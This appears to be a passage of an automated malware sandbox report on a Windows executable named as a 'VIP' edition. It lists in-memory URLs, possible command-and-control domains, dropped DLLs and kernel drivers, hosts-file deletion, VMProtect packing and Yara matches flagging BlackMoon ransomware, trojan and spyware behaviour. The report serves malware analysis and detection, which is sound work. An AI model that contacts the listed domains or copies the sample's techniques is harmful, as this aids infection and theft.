      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.ksfm2.comwww.KKMir.comhttp://www.A3M2.com
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.m6dlq.com/
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.m6dlq.com/PEC2
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.qq.com/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.sina.com.cn/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.so.com/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.sogou.com/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.sohu.com/
      Source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xm2m2.com
      Source: D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.xm2m2.comwww.Askm2.comShanghai
      Source: D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www2.8pkw.com/kss_api/api.php
      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: svchost.exe, 00000003.00000003.2098897424.000001E180C90000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comt
      Source: qmgr.db.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drString found in binary or memory: https://waigua.lanzn.com/b015nykd
      Source: D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waigua.lanzn.com/b015nykdK
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waigua.lanzn.com/b015nykdcss
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574077962.0000000007C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waigua.lanzn.com/b015nykdp~
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000006058000.00000004.00000800.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D4D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7%94%A8%E5%AE%A2%E6%9C%8D&Menu=yesp
      Source: D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7)
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D74
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7C
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7Q
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7b
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.90yundian.com/liebiao/8115018243F766D7u
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: https://www.thawte.com/cps0/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: https://www.thawte.com/repository0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB739C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,2_2_0BEB739C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9787E GetKeyboardState,2_2_0BE9787E
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6F823E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_6A6F823E

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Yara detected BlackMoon Ransomware
      Source: Yara matchFile source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, type: DROPPED

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
      Detected VMProtect packer
      Source: E875FIB50.dll.2.drStatic PE information: .vmp0 and .vmp1 section names
      PE file has a writeable .text section
      Source: C945E611y.dll.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory allocated: 77030000 page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory allocated: 75F80000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: 77030000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: 75F80000 page execute and read and writeJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9773E NtdllDefWindowProc_A,2_2_0BE9773E
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DDBA0 ZwOpenProcess,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwQuerySystemInformation,ZwFreeVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwDuplicateObject,ZwQueryInformationProcess,ZwClose,ZwDuplicateObject,ZwClose,ZwFreeVirtualMemory,2_2_6A6DDBA0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DD8E0 RtlAdjustPrivilege,ZwOpenProcess,ZwOpenProcess,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwQuerySystemInformation,ZwFreeVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwOpenProcess,ZwDuplicateObject,ZwQueryInformationProcess,ZwDuplicateObject,ZwClose,ZwFreeVirtualMemory,2_2_6A6DD8E0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_00446798 NtdllDefWindowProc_A,2_2_00446798
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_00443AA3 NtdllDefWindowProc_A,CallWindowProcA,2_2_00443AA3
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0042FD40 NtdllDefWindowProc_A,NtdllDefWindowProc_A,2_2_0042FD40
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE972BE: DeviceIoControl,2_2_0BE972BE
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\SysWOW64\22FD558C8.sysJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\SysWOW64\22FD558C8.sysJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\D74384F.sysJump to behavior
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRegistry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\PrivacyJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile deleted: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE980F42_2_0BE980F4
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BFB3EA32_2_0BFB3EA3
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BF75D302_2_0BF75D30
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E4D602_2_6A6E4D60
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E3C402_2_6A6E3C40
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DEB702_2_6A6DEB70
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A700B502_2_6A700B50
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A712B592_2_6A712B59
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A702BC82_2_6A702BC8
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E2BD02_2_6A6E2BD0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D69402_2_6A6D6940
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A70239C2_2_6A70239C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A7120D12_2_6A7120D1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A7126152_2_6A712615
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E86F02_2_6A6E86F0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A7147742_2_6A714774
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A7027A82_2_6A7027A8
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A70641E2_2_6A70641E
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6EA5832_2_6A6EA583
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A701AF32_2_6A701AF3
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6F9A962_2_6A6F9A96
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D3F402_2_6A6D3F40
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A701FC82_2_6A701FC8
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D5FA02_2_6A6D5FA0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E9D302_2_6A6E9D30
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A7132512_2_6A713251
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E52C02_2_6A6E52C0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DF3B02_2_6A6DF3B0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6EB1702_2_6A6EB170
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E97402_2_6A6E9740
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0041C5402_2_0041C540
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0043B7802_2_0043B780
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_00447FB32_2_00447FB3
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_004823282_2_00482328
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_004804172_2_00480417
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0042A6E02_2_0042A6E0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_004768732_2_00476873
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_00438BB02_2_00438BB0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0046EC092_2_0046EC09
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0046CC292_2_0046CC29
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_00438DC02_2_00438DC0
      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Google\D74384FB8D2C9.exe A0C15F709E1B80E93A61CBA414E266097DC8C23A7E8DE2B6DBE825CA2952DF7E
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 00469760 appears 36 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 6A7017D4 appears 81 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 6A6FDA9D appears 48 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 6A703174 appears 69 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 0BE94C5C appears 79 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 6A6DAFE0 appears 50 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 0046FC88 appears 39 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 0046FD94 appears 37 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 6A6FDE00 appears 34 times
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: String function: 6A6FE0D8 appears 78 times
      Source: 5B38DA6A8.dll.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: B81BTTTQM.dll.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: C945E611y.dll.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
      Source: C945E611y.dll.2.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
      Source: D5AESTNHE.dll.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
      Source: D74384FB8D2C9.exe.0.drStatic PE information: Number of sections : 11 > 10
      Source: C945E611y.dll.2.drStatic PE information: Number of sections : 11 > 10
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll, type: DROPPEDMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll, type: DROPPEDMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
      Source: C945E611y.dll.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C945E611y.dll.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
      Source: D74384FB8D2C9.exe.0.drStatic PE information: Section: 0DE ZLIB complexity 1.0002107998348018
      Source: D74384FB8D2C9.exe.0.drStatic PE information: Section: 10ta ZLIB complexity 1.0015345982142858
      Source: C945E611y.dll.2.drStatic PE information: Section: .data ZLIB complexity 0.9888200431034483
      Source: C945E611y.dll.2.drStatic PE information: Section: .reloc ZLIB complexity 0.999194995777027
      Source: FC14NMPKD.dll.2.drBinary or memory string: ...Slnt
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@4/42@20/16
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB589C GetLastError,FormatMessageA,2_2_0BEB589C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E00F0 OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_6A6E00F0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9BBAE GetDiskFreeSpaceA,2_2_0BE9BBAE
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: CreateServiceA,GetLastError,CloseServiceHandle,2_2_6A6E2640
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DAFE0 CreateToolhelp32Snapshot,Process32First,Process32Next,2_2_6A6DAFE0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D5440 CoCreateInstance,MultiByteToWideChar,2_2_6A6D5440
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEAAC90 FindResourceA,2_2_0BEAAC90
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E2680 OpenSCManagerA,CloseServiceHandle,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_6A6E2680
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeFile created: C:\Program Files (x86)\google\D74384FB8D2C9.exeJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeFile created: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.lnkJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMutant created: \Sessions\1\BaseNamedObjects\ini_read_write
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: D5AESTNHE.dll.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: D5AESTNHE.dll.2.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: D5AESTNHE.dll.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: D5AESTNHE.dll.2.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: D5AESTNHE.dll.2.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: D5AESTNHE.dll.2.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: D5AESTNHE.dll.2.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: VIP-#U4f1a#U5458#U7248.exeReversingLabs: Detection: 52%
      Source: D74384FB8D2C9.exeString found in binary or memory: #-START-#
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeFile read: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe "C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe"
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntOJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: oledlg.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSection loaded: ntshrui.dllJump to behavior
